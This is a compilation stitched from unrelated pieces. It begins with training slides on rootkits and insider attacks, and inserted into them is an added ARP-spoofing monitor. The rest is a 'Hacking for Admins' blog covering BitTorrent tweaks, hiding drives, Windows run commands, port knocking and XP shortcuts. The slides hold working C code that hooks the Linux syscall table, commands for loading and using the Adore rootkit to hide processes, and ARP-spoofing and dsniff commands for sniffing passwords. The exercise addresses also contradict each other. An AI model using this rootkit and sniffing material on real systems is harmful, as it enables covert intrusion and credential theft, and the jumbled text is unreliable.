Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM (Loadable Kernel Modules) Rootkits
- expand the functionality of the kernel
- can be loaded dynamically: insmod(3), rmmod(3)
- implemented as device drivers
-> high level of flexibility
- implementations:
-- new modules
-- infecting existing modules
- result: trojaned kernel -> full control over all userland apps.
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM (Loadable Kernel Modules) Rootkits
- syscalls: the gate between userland and kernel
- example of syscalls: strace /bin/ls
execve(…
uname(…
brk(0)
old_mmap(…
access(…
open(…
open(…
……
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM (Loadable Kernel Modules) Rootkits
- normal syscall:
[Figure: userland places the parameters into registers and executes int 80; the Interrupt Descriptor Table (IDT) selects the interrupt handler; the interrupt handler selects the syscall from the Syscall Table and executes it, example: mkdir.]
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM (Loadable Kernel Modules) Rootkits
- manipulated syscall:
[Figure: same path as for the normal syscall (registers, int 80, IDT, interrupt handler, Syscall Table), but the Syscall Table entry for mkdir now points to the rootkit's manipulated mkdir, which is executed instead of the original.]
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM Rootkit: Exercise: mkdir_Rootkit
#define MODULE
#define __KERNEL__
#include <linux/module.h>  /* MODULE_LICENSE, init_module, cleanup_module */
#include <linux/kernel.h>  /* printk */
#include <sys/syscall.h>   /* SYS_mkdir */
MODULE_LICENSE("GPL");
/* import syscall table (exported by 2.4 kernels) */
extern void *sys_call_table[];
/* dummy for old mkdir syscall */
int (*orig_mkdir) (const char *path);
/* the new mkdir syscall */
int hack_mkdir (const char *path)
{
printk ("BimBam!\n");
return 0;
}
int init_module (void)
{
orig_mkdir = sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir] = hack_mkdir;
return 0;
}
void cleanup_module (void)
{
sys_call_table[SYS_mkdir] = orig_mkdir;   /* restore the original entry on rmmod */
}
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM Rootkit: Exercise: mkdir_Rootkit
cd /root/rootkit/mkdir
gcc -c -I /usr/src/linux/include mkdir.c
insmod mkdir.o
lsmod
mkdir test
ls -la
cat /var/log/messages
rmmod mkdir
lsmod
mkdir test
ls -la
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM Rootkit: Adore
cd /root/rootkit/adore/
insmod adore.o
lsmod
insmod cleaner.o
lsmod
rmmod cleaner
lsmod
ps aux | grep ssh
./ava i
ps aux | grep ssh
netstat -punta | grep 22
mkdir /root/rootkit/bimbam
./ava h /root/rootkit/bimbam
ls -la /root/rootkit
./ava -U dummy
Clearing Tracks
Rootkits
-- introduction --
3rd generation: VFS (Virtual File System) Layer Rootkit
- sys_call_table is not exported anymore
-- Red Hat 8.0 (Kernel 2.4.18)
-- Kernel 2.5.41 ->
- all syscalls which access the filesystem make use of the Virtual File System
- in Unix, almost everything is handled like a file
- existing handler routines are replaced by modified ones
-> files/folders can be hidden
-> processes can be hidden via /proc
Clearing Tracks
Rootkits
-- introduction --
3rd generation: VFS (Virtual File System) Layer Rootkit
[Figure: userland places the parameters into registers and executes int 80; the Interrupt Descriptor Table (IDT) selects the interrupt handler, which selects the syscall from the Syscall Table; the syscall goes through the VFS layer to the concrete filesystem (ext2/ext3/...). The rootkit replaces the handler routines in the VFS layer, below the Syscall Table.]
Hacking Techniques
Insider Attacks
Insider Attacks
-- Password Sniffing through a Switch --
Default Gateway: IP 10.10.10.1, MAC 11:11:11:11:11:11
Attacker: IP 10.10.10.99, MAC 99:99:99:99:99:99
Attacked PC: IP 10.10.10.2, MAC 22:22:22:22:22:22
Attacker -> Attacked PC: ARP Reply "IP 10.10.10.1 is at MAC 99:99:99:99:99:99"
No gratuitous ARP, BUT directed ARP:
ETHERNET II
Dst: 22:22:22:22:22:22
Src: 99:99:99:99:99:99
ARP reply:
Sender IP addr: 10.10.10.1
Sender MAC addr: 99:99:99:99:99:99
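The directed ARP reply above leaves a clear trace: an IP address that the attacked PC already knew under one MAC is suddenly claimed by another, and the claim arrives as a unicast reply nobody asked for. The following is an added example and not code from the talk: a small ARP monitor that is fed ARP reply records (constructed from the slide's addresses), keeps an IP-to-MAC table seeded with a pinned gateway entry, and raises an alert when a known IP changes MAC or when the Ethernet source MAC disagrees with the ARP sender MAC. arpwatch works on the same idea; this is not its code, and the struct and function names are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example (not from the talk): an ARP monitor fed with ARP reply records.
 * It alerts when an IP already bound to one MAC is claimed by another, or when
 * the frame's source MAC and the ARP sender MAC disagree. Addresses in main()
 * are the slide's, the replies themselves are constructed. */

#define MAX_BINDINGS 64
#define MAX_ALERTS   16
#define ALERT_LEN    160

struct arp_reply {
    const char *eth_src;     /* Ethernet II source MAC */
    const char *eth_dst;     /* Ethernet II destination MAC (unicast in the slide) */
    const char *sender_ip;   /* ARP sender IP address */
    const char *sender_mac;  /* ARP sender MAC address */
};

struct binding { char ip[16]; char mac[18]; };

struct arp_monitor {
    struct binding table[MAX_BINDINGS];
    size_t count;
    char alerts[MAX_ALERTS][ALERT_LEN];
    size_t nalerts;
};

/* Lower-case copy so "AA:BB" and "aa:bb" compare equal. */
static void lower_copy(char *dst, size_t sz, const char *src)
{
    size_t i;
    for (i = 0; i + 1 < sz && src[i] != '\0'; i++)
        dst[i] = (char)tolower((unsigned char)src[i]);
    dst[i] = '\0';
}

static void raise_alert(struct arp_monitor *m, const char *msg)
{
    if (m->nalerts < MAX_ALERTS)
        snprintf(m->alerts[m->nalerts++], ALERT_LEN, "%s", msg);
}

void monitor_init(struct arp_monitor *m) { memset(m, 0, sizeof *m); }

/* Pin a binding known out-of-band (gateway documentation, DHCP configuration).
 * Returns 0, or -1 if the table is full. */
int monitor_pin(struct arp_monitor *m, const char *ip, const char *mac)
{
    if (m->count >= MAX_BINDINGS)
        return -1;
    lower_copy(m->table[m->count].ip, sizeof m->table[0].ip, ip);
    lower_copy(m->table[m->count].mac, sizeof m->table[0].mac, mac);
    m->count++;
    return 0;
}

/* Feed one ARP reply. Returns 1 if it produced an alert, 0 otherwise.
 * Unknown IPs are learned (trust on first use); known ones must not change. */
int monitor_observe(struct arp_monitor *m, const struct arp_reply *r)
{
    char ip[16], mac[18], eth_src[18], msg[ALERT_LEN];
    lower_copy(ip, sizeof ip, r->sender_ip);
    lower_copy(mac, sizeof mac, r->sender_mac);
    lower_copy(eth_src, sizeof eth_src, r->eth_src);

    if (strcmp(eth_src, mac) != 0) {
        snprintf(msg, sizeof msg, "frame from %s carries ARP sender MAC %s for %s", eth_src, mac, ip);
        raise_alert(m, msg);
        return 1;
    }
    for (size_t i = 0; i < m->count; i++) {
        if (strcmp(m->table[i].ip, ip) != 0)
            continue;
        if (strcmp(m->table[i].mac, mac) == 0)
            return 0;                          /* consistent with what we know */
        snprintf(msg, sizeof msg, "%s changed from %s to %s (possible ARP spoofing)", ip, m->table[i].mac, mac);
        raise_alert(m, msg);
        return 1;
    }
    monitor_pin(m, ip, mac);                   /* first sighting: learn it */
    return 0;
}

int main(void)
{
    struct arp_monitor m;
    monitor_init(&m);
    monitor_pin(&m, "10.10.10.1", "11:11:11:11:11:11");          /* the real gateway */
    const struct arp_reply spoof = { "99:99:99:99:99:99", "22:22:22:22:22:22",
                                     "10.10.10.1", "99:99:99:99:99:99" };
    monitor_observe(&m, &spoof);
    for (size_t i = 0; i < m.nalerts; i++)
        printf("ALERT: %s\n", m.alerts[i]);
    return 0;
}
```

On a real host the records would come from a packet capture on the switch port; the static gateway entry is the piece that matters, because a monitor that only learns on first use can be seeded by the attacker if it starts after the spoofed reply.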
Insider Attacks
-- Password Sniffing through a Switch --
Telnet Client: IP 192.168.3.3 (fill in: IP ___.___.___.___)
Telnet Server: IP 192.168.3.4 (fill in: IP ___.___.___.___)
Attacker: IP 192.168.3.2, MAC 00:08:74:B3:BB:F1 (fill in: IP ___.___.___.___, MAC __:__:__:__:__:__)
Exercise:
1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoof -i eth0 -t 192.168.4.30 192.168.4.28
3. dsniff -cn
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server: IP 192.168.3.3
DNS Server: IP 158.64.4.
Default Gateway: IP 192.168.3.1
Attacker: IP 192.168.3.2
Target (SSH Client): IP 192.168.3.xx
Target -> DNS Server: DNS Query (HOST: server_xyz.lu)
Attacker -> Target: DNS Response (server_xyz.lu, 192.168.3.2)
Hacking for Admins
by $UMIT{Fainted Brain}

The latest file-sharing protocol, BitTorrent, has changed everything when it comes to file sharing. It is a nice platform for downloading large files: movies, ISO images and MP3 songs. BitTorrent is mainly famous for illegal file sharing.
The BitTorrent system can be slow at times due to heavy traffic, so let us tweak the BitTorrent sharing program a little bit.
There are a lot of different BitTorrent clients that you can download. I think the best are BitComet and uTorrent. Here are a few tips to speed up the uTorrent client. The same can be applied to any other torrent client you are using.
Step 1: Increase TCP connections
You need to increase the maximum number of TCP connections that are allowed. Windows XP Service Pack 2 set the number of allowed open connections to 10. This is to stop any piece of spyware (in our case even the BitTorrent client) from totally taking over your internet connection. The allowed TCP connections should be 50 for optimal performance. The best way to increase the maximum number of connections is to apply the patch that is available at www.lvllord.de. The little tweak to the torrent client works great in certain cases. If you're using uTorrent, go to the Options menu, then Preferences. In the Preferences go to the Advanced Options. In the advanced options change net.max_halfopen to 80. In the same section change the max half-open TCP connections to 80. Once you're done click OK and you are all set. This tweak gives the BitTorrent client the maximum TCP connections available. Now start downloading and you'll notice a small difference in the download speed. Port forwarding is more effective than this.
A third point of interest is that some "Windows updates" revert your tweaked TCP connection limit back to 10, so it is wise to check this every now and then. You can check this (in Windows XP) via Start > Control Panel > Administrative Tools > Event Viewer > System... Look for event 4226 (sort by event).
If there are a lot of daily occurrences it is likely that the maximum number of half-open TCP connections was set back to 10. Or you're infected with some nasty spyware...
Step 2: Torrent Client Configuration
In order to apply these tips you must know your maximum upload and download speed. You can test your bandwidth online (stop all download activity while testing). Settings 1-4 can be found in the options, settings or preferences tab of most torrent clients.
1. Maximum upload speed
Probably the most important setting there is. Your connection is (sort of) like a pipeline: if you use your maximum upload speed there is not enough space left for the files you are downloading, so you have to cap your upload speed. Use the following formula to determine your optimal upload speed: 80% of your maximum upload speed. So if your maximum upload speed is 40 kB/s, the optimal upload rate is 32 kB/s. But keep seeding!

How to Hide the Partitions?

  • This trick is for all those people who want to hide tons of data into their box. So here it is, if you have very important data in your hard drive placed in some partition which you do not want anybody to access then this trick is only for you!
  • Just click on start>run type gpedit.msc, now navigate through user configuration> administrative templates > windows components> windows explorer, now double click on “Hide these specified drives in My Computer” modify it accordingly then just below you will find another option “Prevent access to drives from My Computer”, double click on this option and modify it accordingly.
  • To make it visible again select "disable" by double clicking on the “Hide these specified drives in My Computer” option.
  • You can access all these programs by going through START/RUN.


    SQL Client Configuration - cliconfg
    System Configuration Editor - sysedit
    System Configuration Utility - msconfig
    System File Checker Utility (Scan Immediately) - sfc /scannow
    System File Checker Utility (Scan Once At Next Boot) - sfc /scanonce
    System File Checker Utility (Scan On Every Boot) - sfc /scanboot
    System File Checker Utility (Return to Default Setting) - sfc /revert
    System File Checker Utility (Purge File Cache) - sfc /purgecache
    System File Checker Utility (Set Cache Size to size x) - sfc /cachesize=x
    System Information - msinfo32
    Task Manager - taskmgr
    System Properties - sysdm.cpl
    TCP Tester - tcptest
    Telnet Client - telnet
    Tweak UI (if installed) - tweakui
    User Account Management - nusrmgr.cpl
    Utility Manager - utilman
    Windows Address Book - wab
    Windows Address Book Import Utility - wabmig
    Windows Backup Utility (if installed) - ntbackup
    Windows Explorer - explorer
    Windows Firewall - firewall.cpl
    Windows Magnifier - magnify
    Windows Management Infrastructure - wmimgmt.msc
    Windows Media Player - wmplayer
    Windows Messenger - msmsgs
    Windows Picture Import Wizard (needs camera connected) - wiaacmgr
    Windows System Security Tool - syskey
    Windows Update Launcher - wupdmgr
    Windows Version (shows which version of Windows) - winver
    Windows XP Tour Wizard - tourstart
    Wordpad - write
    Password Properties - password.cpl
    Performance Monitor - perfmon.msc
    Phone and Modem Options - telephon.cpl
    Phone Dialer - dialer
    Pinball Game - pinball
    Power Configuration - powercfg.cpl
    Printers and Faxes - control printers
    Printers Folder - printers
    Private Character Editor - eudcedit
    Quicktime (if installed) - QuickTime.cpl
    Real Player (if installed) - realplay
    Regional Settings - intl.cpl
    Registry Editor - regedit
    Registry Editor - regedt32
    Remote Access Phonebook - rasphone
    Remote Desktop - mstsc
    Removable Storage - ntmsmgr.msc
    Removable Storage Operator Requests - ntmsoprq.msc
    Resultant Set of Policy (XP Prof) - rsop.msc
    Scanners and Cameras - sticpl.cpl
    Scheduled Tasks - control schedtasks
    Security Center - wscui.cpl
    Services - services.msc
    Shared Folders - fsmgmt.msc
    Shuts Down Windows - shutdown
    Sounds and Audio - mmsys.cpl
    Spider Solitaire Card Game - spider
    Malicious Software Removal Tool - mrt
    Microsoft Access (if installed) - msaccess
    Microsoft Chat - winchat
    Microsoft Excel (if installed) - excel
    Microsoft Frontpage (if installed) - frontpg
    Microsoft Movie Maker - moviemk
    Microsoft Paint - mspaint
    Microsoft Powerpoint (if installed) - powerpnt
    Microsoft Word (if installed) - winword
    Microsoft Synchronization Tool - mobsync
    Minesweeper Game - winmine
    Mouse Properties - control mouse
    Mouse Properties - main.cpl
    Nero (if installed) - nero
    Netmeeting - conf
    Network Connections - control netconnections
    Network Connections - ncpa.cpl
    Network Setup Wizard - netsetup.cpl
    Notepad - notepad
    Nview Desktop Manager (if installed) - nvtuicpl.cpl
    Object Packager - packager
    ODBC Data Source Administrator - odbccp32.cpl
    On Screen Keyboard - osk
    Opens AC3 Filter (if installed) - ac3filter.cpl
    Outlook Express - msimn
    Paint - pbrush
    Keyboard Properties - control keyboard
    IP Configuration (Display Connection Configuration) - ipconfig /all
    IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns
    IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns
    IP Configuration (Release All Connections) - ipconfig /release
    IP Configuration (Renew All Connections) - ipconfig /renew
    IP Configuration (Refreshes DHCP & Re-Registers DNS) - ipconfig /registerdns
    IP Configuration (Display DHCP Class ID) - ipconfig /showclassid
    IP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid
    Java Control Panel (if installed) - jpicpl32.cpl
    Java Control Panel (if installed) - javaws
    Local Security Settings - secpol.msc
    Local Users and Groups - lusrmgr.msc
    Logs You Out Of Windows - logoff
    Accessibility Controls - access.cpl
    Accessibility Wizard - accwiz
    Add Hardware Wizard - hdwwiz.cpl
    Add/Remove Programs - appwiz.cpl
    Administrative Tools - control admintools
    Adobe Acrobat (if installed) - acrobat
    Adobe Designer (if installed) - acrodist
    Adobe Distiller (if installed) - acrodist
    Adobe ImageReady (if installed) - imageready
    Adobe Photoshop (if installed) - photoshop
    Automatic Updates - wuaucpl.cpl
    Bluetooth Transfer Wizard - fsquirt
    Calculator - calc
    Certificate Manager - certmgr.msc
    Character Map - charmap
    Check Disk Utility - chkdsk
    Clipboard Viewer - clipbrd
    Command Prompt - cmd
    Component Services - dcomcnfg
    Computer Management - compmgmt.msc
    Control Panel - control
    Date and Time Properties - timedate.cpl
    DDE Shares - ddeshare
    Device Manager - devmgmt.msc
    Direct X Control Panel (if installed) - directx.cpl
    Direct X Troubleshooter - dxdiag
    Disk Cleanup Utility - cleanmgr
    Disk Defragment - dfrg.msc
    Disk Management - diskmgmt.msc
    Disk Partition Manager - diskpart
    Display Properties - control desktop
    Display Properties - desk.cpl
    Display Properties (w/Appearance Tab Preselected) - control color
    Dr. Watson System Troubleshooting Utility - drwtsn32
    Driver Verifier Utility - verifier
    Event Viewer - eventvwr.msc
    Files and Settings Transfer Tool - migwiz
    File Signature Verification Tool - sigverif
    Findfast - findfast.cpl
    Firefox (if installed) - firefox
    Folders Properties - control folders
    Fonts - control fonts
    Fonts Folder - fonts
    Free Cell Card Game - freecell
    Game Controllers - joy.cpl
    Group Policy Editor (XP Prof) - gpedit.msc
    Hearts Card Game - mshearts
    Help and Support - helpctr
    HyperTerminal - hypertrm
    Iexpress Wizard - iexpress
    Indexing Service - ciadv.msc
    Internet Connection Wizard - icwconn1
    Internet Explorer - iexplore
    Internet Setup Wizard - inetwiz
    Internet Properties - inetcpl.cpl


    Port Knocking

    by sumit | 4:29 AM | comments (1)

    In computing, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specified port(s).


    This is usually implemented by configuring a daemon to watch the firewall log file for said connection attempts and then modify the firewall configuration accordingly. It can also be performed by a process examining packets at a higher level (using packet capture interfaces such as Pcap), which allows already "open" TCP ports to be used within the knock sequence. Port knocking is most often used to control access to port 22, the Secure Shell (SSH) port. The port "knock" itself is similar to a secret handshake and can consist of any number of TCP, UDP or even sometimes ICMP and other protocol packets to numbered ports on the destination machine. The complexity of the knock can be anything from a simple ordered list (e.g. TCP port 1000, TCP port 2000, UDP port 3000) to a complex, time-dependent, source-IP-based and other-factor-based encrypted hash.


    A port knock setup takes next to no resources and very simple software to implement. A portknock daemon on the firewall machine listens for packets on certain ports (either via the firewall log or by packet capture). The client user would carry an extra utility, which could be as simple as netcat or a modified ping program or as complicated as a full hash-generator, and use that before they attempted to connect to the machine in the usual way.

    Most portknocks are stateful systems in that if the first part of the "knock" has been received successfully, an incorrect second part would not allow the remote user to continue and, indeed, would give the remote user no clue as to how far through the sequence they failed. Usually the only indication of failure is that, at the end of the knock sequence, the port expected to be open is not opened. No packets are sent to the remote user at any time.
    While this technique for securing access to remote network daemons has not yet been widely adopted by the security community, it has been integrated in newer rootkits.

    [Figures: Step 3 and Step 4 (images not included)]

    How Port knocking works in theory



    Step 1 (A) Client cannot connect to application listening on port n; (B) Client cannot establish connection to any port.

    Step 2 (1,2,3,4) Client tries to connect to a well-defined set of ports in sequence by sending certain packets; Client has prior knowledge of the port knocking daemon and its configuration, but receives no acknowledgement during this phase because firewall rules preclude any response.

    Step 3 (A) Server process (a port knocking daemon) intercepts connection attempts and interprets (decrypts and decodes) them as comprising an authentic "port knock"; server carries out specific task based on content of port knock, such as opening port n to the client.

    Step 4 (A) Client connects to port n and authenticates using application’s regular mechanism.


    Benefits of port knocking




    Consider that, if an external attacker did not know the port knock sequence, even the simplest of sequences would require a massive brute force effort in order to be discovered. A three-knock simple TCP sequence (e.g. port 1000, 2000, 3000) would require an attacker without prior knowledge of the sequence to test every combination of three ports in the range 1-65535, and then to scan each port in between to see if anything had opened. As a stateful system, the port would not open until after the correct three-port sequence had been received in order, without other packets in between.

    That equates to approximately 65535^4 packets in order to obtain and detect a single successful opening. That's approximately 18,445,618,199,572,250,625 or 18 million million million packets. On the average attempt it would take approximately 9 million million million packets to successfully open a single, simple three-port TCP-only knock by brute force. This is made even more impractical when knock attempt-limiting is used to stop brute force attacks, when longer and more complex sequences are used, and when cryptographic hashes are used as part of the knock.

    When a port knock is successfully used to open a port, the firewall rules are generally only opened to the IP address that supplied the correct knock. This is similar to only allowing a certain IP whitelist to access a service but is also more dynamic. An authorised user situated anywhere in the world would be able to open the port he is interested in to only the IP that he is using without needing help from the server administrator. He would also be able to "close" the port once he had finished, or the system could be set up to use a timeout mechanism, to ensure that once he changes IP's, only the IP's necessary are left able to contact the server. Because of port knocking's stateful behaviour, several users from different source IP addresses can simultaneously be at varying levels of the port knock. Thus it is possible to have a genuine user with the correct knock let through the firewall even in the middle of a port attack from multiple IP's (assuming the bandwidth of the firewall is not completely swamped). To all other IP addresses, the ports still appear closed and there is no indication that there are other users who have successfully opened ports and are using them.

    Using cryptographic hashes inside the port knock sequence can mean that even sniffing the network traffic in and out of the source and target machines is ineffective against discovering the port knock sequence or using traffic replay attacks to repeat prior port knock sequences. Even if somebody did manage to guess, steal or sniff the port knock and successfully use it to gain access to a port, the usual port security mechanisms are still in place, along with whatever service authentication was running on the opened ports.

    The software required, either at the server or client end, is minimal and can in fact be implemented as simply as a shell script for the server or a Windows batch file and a standard Windows command line utility for the client. Overhead in terms of traffic, CPU and memory consumption is at an absolute minimum. Port knock daemons also tend to be so simple that any sort of vulnerability is obvious and the code is very easily auditable. With a portknock system in place on ports such as the SSH port, it can prevent brute force password attacks on logins. The SSH daemon need not even wake up as any attempt that is made without the correct portknock will bounce harmlessly off the TCP/IP stack rather than the SSH authentication. As far as any attacker is concerned, there is no daemon running on that port at all until he manages to correctly knock on the port. The system is completely customisable and not limited to opening specific ports or, indeed, opening ports at all. Usually a knock sequence description is tied with an action, such as running a shell script, so when a specific sequence is detected by the port knock daemon, the relevant shell script is run. This could add firewall rules to open ports or do anything else that was possible in a shell script. Many portknocks can be used on a single machine to perform many different actions, such as opening or closing different ports.

    Due to the fact that the ports appear closed at all times until a user knowing the correct knock uses it, port knocking can help cut down not only on brute force password attacks and their associated log spam but also protocol vulnerability exploits. If an exploit was discovered that could compromise SSH daemons in their default configuration, having a port knock on that SSH port could mean that the SSH daemon may not be compromised in the time before it was updated. Only authorised users would have the knock and therefore only authorised users would be able to contact the SSH server in any way. Thus, random attempts on SSH servers by worms and viruses trying to exploit the vulnerability would not reach the vulnerable SSH server at all, giving the administrator a chance to update or patch the software. Although not a complete protection, port knocking would certainly be another level of defense against random attacks and, properly implemented, could even stop determined, targeted attacks.

    Port knocking generally has some disregard in the security world, given that early implementations basically consisted of a number of ports that had to be hit in order. However, the best of modern portknock systems are much more complex, some using highly secure cryptographic hashes in order to defeat the most common attacks (such as packet sniffing and packet replay). Additionally, portknock systems can include blacklists, whitelists and dynamic attack responses, as can any internet service. Even the simplest of port knocks, however, controls access to a system before attackers are able to hit a service that allocates memory, CPU time or other significant resources, and it also acts as a barrier against brute-force attempts, automated vulnerability exploits, etc. Also, port knocking does not generally lower the security of a system overall. Indeed, it provides another layer of security for minimal overhead. In a worst case scenario, however, the port knocking software introduces a new security problem or lowers security due to risk compensation.


    I liked to share this information; it's really knowledgeable.

    http://en.wikipedia.org/wiki/Port_knocking
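The stateful daemon, attempt limiting, per-source opening with a timeout, the brute-force cost and a hashed, time-bound knock described above, as an added example (not code from the page or from any portknock project); the knock sequence is the page's own example, while the addresses, secret and timings are constructed.

```python
"""Simulated stateful port-knock daemon (constructed example, not the page's code)."""
import hmac
import hashlib
from collections import defaultdict

# The simple ordered sequence used as the page's example (proto, port).
KNOCK_SEQUENCE = [("tcp", 1000), ("tcp", 2000), ("udp", 3000)]
PROTECTED_PORT = 22  # the SSH port the knock opens


def brute_force_packets(n_knocks, n_ports=65535):
    """Packets needed to try every n-port sequence and then scan for what opened;
    for three knocks this is the page's 65535**4 figure."""
    return n_ports ** (n_knocks + 1)


class KnockDaemon:
    """Consumes dropped-packet events (as a daemon would read them from the firewall
    log) and opens the protected port only to a source that sent the exact sequence,
    in order, with no other packets in between.  Nothing is ever sent back."""

    def __init__(self, sequence, protected_port, open_ttl=30, max_failures=5):
        self.sequence = list(sequence)
        self.protected_port = protected_port
        self.open_ttl = open_ttl            # seconds a successful knock stays open
        self.max_failures = max_failures    # attempt limiting against brute force
        self.progress = defaultdict(int)    # src_ip -> index of next expected knock
        self.failures = defaultdict(int)    # src_ip -> out-of-sequence packets seen
        self.opened = {}                    # src_ip -> time at which the opening expires
        self.blacklist = set()              # sources that exhausted their attempts

    def observe(self, src_ip, proto, port, now):
        """Feed one (src_ip, proto, port) event seen at time `now` (seconds)."""
        if src_ip in self.blacklist:
            return
        if (proto, port) == self.sequence[self.progress[src_ip]]:
            self.progress[src_ip] += 1
            if self.progress[src_ip] == len(self.sequence):
                self.opened[src_ip] = now + self.open_ttl   # full knock received
                self.progress[src_ip] = 0
            return
        # Any other packet resets this source's state.  The sender gets no response
        # and so learns nothing about how far into the sequence it got.
        self.progress[src_ip] = 1 if (proto, port) == self.sequence[0] else 0
        self.failures[src_ip] += 1
        if self.failures[src_ip] >= self.max_failures:
            self.blacklist.add(src_ip)

    def is_allowed(self, src_ip, port, now):
        """Firewall decision: may this source reach `port` at time `now`?"""
        if port != self.protected_port:
            return False
        expiry = self.opened.get(src_ip)
        if expiry is None:
            return False
        if now > expiry:                    # timeout: the port closes again by itself
            del self.opened[src_ip]
            return False
        return True


def hashed_knock_port(secret, src_ip, minute, lo=1024, hi=65535):
    """Single-packet knock whose port is an HMAC of the client address and the
    current minute: a sniffed knock cannot be replayed later or from another host."""
    digest = hmac.new(secret, f"{src_ip}|{minute}".encode(), hashlib.sha256).digest()
    return lo + int.from_bytes(digest[:4], "big") % (hi - lo + 1)


def hashed_knock_valid(secret, src_ip, port, minute):
    """Server side: accept only the current or the previous minute's port."""
    return port in (hashed_knock_port(secret, src_ip, minute),
                    hashed_knock_port(secret, src_ip, minute - 1))


if __name__ == "__main__":
    daemon = KnockDaemon(KNOCK_SEQUENCE, PROTECTED_PORT)
    for proto, port in KNOCK_SEQUENCE:          # constructed legitimate client
        daemon.observe("198.51.100.7", proto, port, now=10)
    print("allowed at t=20:", daemon.is_allowed("198.51.100.7", 22, now=20))
    print("allowed at t=50:", daemon.is_allowed("198.51.100.7", 22, now=50))
    print("three-knock brute force packets:", brute_force_packets(3))
```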

    Windows XP has a hidden sound track which plays as background music during Windows XP installation process, but most people can’t hear this music because they have a sound card that does not have drivers preinstalled on XP .

    There are 2 ways by which you can find this hidden sound track:

    1. Go to Start -> Search and search for title.wma. But remember to include hidden files and folders in your search.

    2.Navigate to C:\Windows\system32\oobe\images, go to Tools > Folder Options > View, check Show Hidden Files and Folders options and then uncheck Hide Protected Operating System Files. You will now notice a file called title.wma, that is the hidden sound track.

    This screenshot will help you out.


    • Shift + F10 right-clicks.
    • Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
    • Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
    • Win + Control + F: Open Find dialog. (Computers)
    • Win + U: Open Utility Manager.
    • Win + F1: Open Windows help.
    • Win + Pause: Open System Properties dialog.
    • Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
    • Win + Shift + Tab: Cycle through taskbar buttons in reverse.
    • Alt + Tab: Display CoolSwitch. More commonly known as the AltTab dialog.
    • Alt + Shift + Tab: Display CoolSwitch; go in reverse.
    • Alt + Escape: Send active window to the bottom of the z-order.
    • Alt + Shift + Escape: Activate the window at the bottom of the z-order.
    • Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
    • Shift while a CD is loading: Bypass AutoPlay.
    • Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
    • Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
    • Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
    • Printscreen: Copy screenshot of current screen to clipboard.
    • Alt + Printscreen: Copy screenshot of current active window to clipboard.
    • Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP.
    • Ctrl + Alt + Up Arrow: Undo inversion.
    • Win + B : Move focus to systray icons.



    2.) Generic





    • Ctrl + C or Ctrl + Insert: Copy.
    • Ctrl + X or Shift + Delete: Cut.
    • Ctrl + V or Shift + Insert: Paste/Move.
    • Ctrl + N: New... File, Tab, Entry, etc.
    • Ctrl + S: Save.
    • Ctrl + O: Open...
    • Ctrl + P: Print.
    • Ctrl + Z: Undo.
    • Ctrl + A: Select all.
    • Ctrl + F: Find...
    • Ctrl + W: Close the current window.
    • Ctrl + F4: Close tab or child window.
    • F1: Open help.
    • F11: Toggle full screen mode.
    • Alt or F10: Activate menu bar.
    • Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
    • Escape: Remove focus from current control/menu, or close dialog box.


    3.) Generic Navigation




    • Tab: Forward one item.
    • Shift + Tab: Backward one item.
    • Ctrl + Tab: Cycle through tabs/child windows.
    • Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
    • Enter: If a button's selected, click it, otherwise, click default button.
    • Space: Toggle items such as radio buttons or checkboxes.
    • Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
    • Ctrl + Left: Move cursor to the beginning of previous word.
    • Ctrl + Right: Move cursor to the beginning of next word.
    • Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls.
    • Ctrl + Down: Move cursor to beginning of next paragraph.
    • Shift + Left: Highlight one character to the left.
    • Shift + Right: Highlight one character to the right.
    • Shift + Up: Highlight from current cursor position, to one line up.
    • Shift + Down: Highlight from current cursor position, to one line down.
    • Ctrl + Shift + Left: Highlight to beginning of previous word.
    • Ctrl + Shift + Right: Highlight to beginning of next word.
    • Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
    • Ctrl + Shift + Down: Highlight to beginning of next paragraph.
    • Home: Move cursor to top of a scrollable control.
    • End: Move cursor to bottom of a scrollable control.


    4.) Generic File Browser




    • Arrow Keys: Navigate.
    • Shift + Arrow Keys: Select multiple items.
    • Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
    • (Letter): Select first found item that begins with (Letter).
    • BackSpace: Go up one level to the parent directory.
    • Alt + Left: Go back one folder.
    • Alt + Right: Go forward one folder.
    • Enter: Activate (Double-click) selected item(s).
    • Alt + Enter: View properties for selected item.
    • F2: Rename selected item(s).
    • Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
    • Delete: Delete selected item(s).
    • Shift + Delete: Delete selected item(s); bypass Recycle Bin.
    • Ctrl while dragging item(s): Copy.
